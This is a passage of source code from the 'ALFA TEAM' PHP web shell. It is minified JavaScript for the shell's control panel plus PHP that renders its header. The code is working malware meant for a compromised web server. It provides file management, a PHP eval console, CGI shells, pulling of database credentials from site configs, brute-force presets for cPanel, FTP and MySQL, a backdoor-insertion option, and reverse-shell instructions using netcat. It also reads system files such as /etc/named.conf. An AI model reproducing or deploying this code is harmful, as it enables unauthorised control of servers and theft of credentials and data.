console.log(t),loadPopUpDatabase(e,t),!1;if("FilesMan"==a){alfaloader("filesman_holder_"+fm_id,"none"),d.querySelector("#filesman_holder_"+fm_id).innerHTML=e,fm_path=fm_path.replace(/\/\//g,"/"),$("filesman_tab_"+fm_id).setAttribute("path",fm_path);var l=alfaGetLastFolderName(fm_path);d.querySelector("#filesman_tab_"+fm_id+" span").innerHTML=l,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e),alfaCheckCurrentFilesManTab(fm_id)}else(options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit()},!1,""==g_action_id?"."+a:g_action_id),g_action_id="",0==fm_id2&&c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaGetLastFolderName(e){var a=e.replace(/\/\//g,"/").split("/");for(var t in a)0==a[t].length&&a.splice(t,1);var i=a[a.length-1];return 0==i.length&&(i="/"),i}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e.substr(0,15)?(i=$(e)).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id='loader_"+e+'\' class="options-loader-holder"><div parent="'+e+'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">ALFA TEAM</div><div class="alfa-ajax-error"></div><img src=\'http://solevisible.com/images/loader.svg\'></div>')}else"filesman_holder"==e.substr(0,15)&&($(e).style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fs(e){var a=e.getAttribute("db_id"),t=d.querySelector("#"+a+" div.sf");mysql_cache.hasOwnProperty(a)||(mysql_cache[a]={}),alfaloader(a,"block");var i=t.querySelector("input[name=sql_host]").value,l=t.querySelector("input[name=sql_login]").value,o=t.querySelector("input[name=sql_pass]").value,r=t.querySelector("input[name=sql_base]")?t.querySelector("input[name=sql_base]").value:t.querySelector("select[name=sql_base]").value,n=t.querySelector("select[name=type]").value,s=t.querySelector("input[name=sql_count]").checked?"true":"";_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("query")+"&alfa2=&c="+alfab64(c_)+"&charset="+alfab64("UTF-8")+"&type="+alfab64(n)+"&sql_host="+alfab64(i)+"&sql_login="+alfab64(l)+"&sql_pass="+alfab64(o)+"&sql_base="+alfab64(r)+"&sql_count="+alfab64(s)+"&current_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,a)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML='<label class="inputfile" for="'+e+'"><span id="__fnameup'+upcount+'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="'+e+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');" multiple>',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){var a=e.target.getAttribute("path"),t=d.querySelector("#rightclick_menu > a[name=newtab]");t.setAttribute("href","javascript:void(0);"),t.removeAttribute("target"),t.onclick=function(){alfaFilesManNewTab(a,"/")};var i=e.clientX,l=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(i,l),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\./g,"\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,_=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var u=getCookie("alfa_history_files");try{for(var p in u=atob(u),editor_files=JSON.parse(u))insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){_=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick='editorTabController(this);' opt_id='"+b+"' id='tab_"+b+"' class='editor-tab-name editor-tab-active'>"+decodeURIComponent(e)+" <img opt_id='"+b+"' onclick='closeEditorContent(this,event);return false;' title='[close]' src='http://solevisible.com/icons/menu/delete.svg'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class='editor-contents editor-content-active' id='"+b+"'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&_?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),alfa_ace_editors.editor["view_ml_content-"+t].commands.addCommand({name:"save",bindKey:{win:"Ctrl-S",mac:"Cmd-S"},exec:function(e){d.querySelector("#ace-save-btn-"+t).click()}}),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t),-1!=e.classList.value.indexOf("ace-save-btn")&&e.setAttribute("id","ace-save-btn-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id='"+e+"' class='history' onClick='reopen(this);'><div class='editor-icon'>"+loadType(a,i,e)+"</div><div class='editor-file-name'>"+a+"</div></div><div class='history-close' onClick='removeHistory(\""+e+"\");'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class='editor-icon'>"+loadType(editor_files[t].file,e,t)+"</div><div class='editor-file-name'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return'<img src="http://solevisible.com/icons/{type}" width="30" height="30">'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,d="id_delete_"+e,s=$(t).getAttribute("ftype");"folder"==s&&(s="dir"),"file"==s?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor('"+a+"','auto','','','','file')"),$(r).setAttribute("onclick","editor('"+a+"','edit','','','','"+s+"')"),$(n).setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g('FilesMan', '"+c_+"/"+a+"')")),$(i).setAttribute("onclick","editor('"+a+"','chmod','','','','"+s+"')"),$(l).setAttribute("onclick","editor('"+a+"','rename','','','','"+s+"')"),$(o).setAttribute("onclick","editor('"+a+"','touch','','','','"+s+"')"),$(d).setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\/\//g,"/"),l=l.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",btoa(JSON.stringify(editor_files)),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php  echo __ALFA_SECRET_KEY__; ?> 
")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(e){var a=alfa_current_fm_id,t=e.checked;d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked=t})}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)}; 
</script> 
<?php  echo "<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>\xa<input type='hidden' name='a' value='dlfile'>\xa<input type='hidden' name='c' value=''>
<input type='hidden' name='file' value=''>
</form>\xa<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
<div id='a_loader'><img src='" . __showicon("loader") . "'></div>"; $cmd_uname = alfaEx("uname -a", false, false); $uname = function_exists("php_uname") ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : "( php_uname ) Function Disabled !"); if ($uname == "( php_uname ) Function Disabled !") { $GLOBALS["need_to_update_header"] = "true"; } echo "
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div id="up_bar_holder"></div>
<div class="whole">
<form method="post" name="mf" style="display:none;">
<input type="hidden" name="a">
<input type="hidden" name="c" value="" . $GLOBALS["cwd"] . "">"; for ($s = 1; $s <= 10; $s++) { echo "<input type="hidden" name="alfa" . $s . "">"; } echo "<input type="hidden" name="charset">\xa</form>\xa<div id='hidden_sh'><a class="alert_green" target="_blank" href="?solevisible"><span style="color:#42ff59;">" . __ALFA_CODE_NAME__ . "</span><br><small>Version: <span class="hidden_shell_version">" . __ALFA_VERSION__ . "</span></small></a></div>
<div class="header"><table width="100%" border="0">
<tr>\xa<td width="3%"><span class="header_vars">Uname:</span></td>\xa<td colspan="2"><span class="header_values" id="header_uname">" . $uname . "</span></td>
</tr>
<tr>
<td><span class="header_vars">User:</span></td>
<td><span class="header_values" id="header_userid">" . $uid . " [ " . $user . " ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">" . $gid . " [ " . $group . " ]</span> </td>
<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></td>\xa</tr>\xa<tr>\xa<td><span class="header_vars">PHP:</span></td>
<td><b>" . @phpversion() . " </b><span class="header_vars"> Safe Mode: " . $safe_modes . "</span></td>\xa</tr>\xa<tr>\xa<td><span class="header_vars">ServerIP:</span></td>\xa<td><b>" . (!@$_SERVER["SERVER_ADDR"] ? function_exists("gethostbyname") ? @gethostbyname($_SERVER["SERVER_NAME"]) : "????" : @$_SERVER["SERVER_ADDR"]) . "</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> " . @$_SERVER["REMOTE_ADDR"] . "</b><div style="display:inline;display:none;" class="flag-holder"></div></td>
</tr>\xa<tr>\xa<td width="3%"><span class="header_vars">DateTime:</span></td>\xa<td colspan="2"><b>" . date("Y-m-d H:i:s") . "</b></td>
</tr>\xa<tr>\xa<td><span class="header_vars">Domains:</span></td>\xa<td width="76%"><span class="header_values" id="header_domains">"; if ($GLOBALS["sys"] == "unix") { $d0mains = _alfa_file("/etc/named.conf", false); if (!$d0mains) { echo "Cant Read [ /etc/named.conf ]"; $GLOBALS["need_to_update_header"] = "true"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "zone")) { preg_match_all("#zone "(.*)"#", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } echo "{$count} Domains"; } } else { echo "Cant Read [ /etc/named.conf ]"; } echo "</span></td>
</tr>\xa<tr>
<td height="16"><span class="header_vars">HDD:</span></td>\xa<td><span class="header_vars">Total:</span><b>" . alfaSize($totalSpace) . " </b><span class="header_vars">Free:</span><b>" . alfaSize($freeSpace) . " [" . (int) ($freeSpace / $totalSpace * 100) . "%]</b></td>
